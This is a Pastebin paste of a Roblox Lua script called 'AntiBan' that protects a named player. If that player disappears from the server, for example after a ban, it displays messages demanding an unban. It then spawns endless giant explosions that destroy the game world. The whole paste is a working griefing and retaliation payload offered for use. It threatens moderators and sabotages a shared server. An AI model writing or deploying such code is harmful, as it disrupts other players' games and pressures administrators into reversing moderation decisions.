Advertisement
Dryiu

Untitled

Jul 23rd, 2016
96
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. n = "B"
  2. n = n.."a"
  3. n = n.."ns"
  4. n = n.."e"
  5. n = n.."y"
  6. h = Instance.new("Hint")
  7. m = Instance.new("Message")
  8. script.Name = "AntiBan"
  9.  
  10. respawntime = .1
  11. protect = "1"
  12.  
  13. version = 1.05
  14.  
  15. while true do
  16. if game.Players:findFirstChild(protect) == nil then
  17. m.Parent = game.Workspace
  18. m.Text = protect.." Server is going crazy."
  19. wait(.1)
  20. m.Text = "Unban "..protect.." or remove your script, else the server will be down with the following countdown!"
  21. wait(.1)
  22. for i= respawntime, 0, -1 do
  23. if game.Players:findFirstChild(protect) == nil then
  24. m.Text = "Server is out of control, bye."
  25. wait(.1)
  26. end
  27. end
  28. if game.Players:findFirstChild(protect) ~= nil then
  29. m.Text = protect.."Oh wait, my bad"
  30. wait(.1)
  31. m:remove()
  32. else
  33. while true do
  34. local DIE = Instance.new("Explosion",game.Workspace)
  35. DIE.BlastRadius = 999999999
  36. DIE.BlastPressure = 10000000000000000
  37. DIE.DestroyJointRadiusPercent = 9999999999999
  38. wait()
  39. end
  40. end
  41. else
  42. h.Parent = game.Workspace
  43. h.Text = "Leave"
  44. end
  45. wait()
  46. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement